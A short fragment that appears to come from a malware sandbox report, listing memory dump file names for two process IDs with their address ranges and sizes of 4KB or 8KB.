memory/2008-152-0x000000001C7F0000-0x000000001C7F2000-memory.dmpFilesize
8KB
-
memory/2008-129-0x000000013F3E0000-0x000000013F3E1000-memory.dmpFilesize
4KB
-
memory/2008-125-0x0000000000000000-mapping.dmp
-
memory/2036-151-0x000000001ACD0000-0x000000001ACD2000-memory.dmpFilesize
8KB
-
memory/2036-122-0x0000000000000000-mapping.dmp
-
memory/2036-130-0x000000013F110000-0x000000013F111000-memory.dmpFilesize
4KB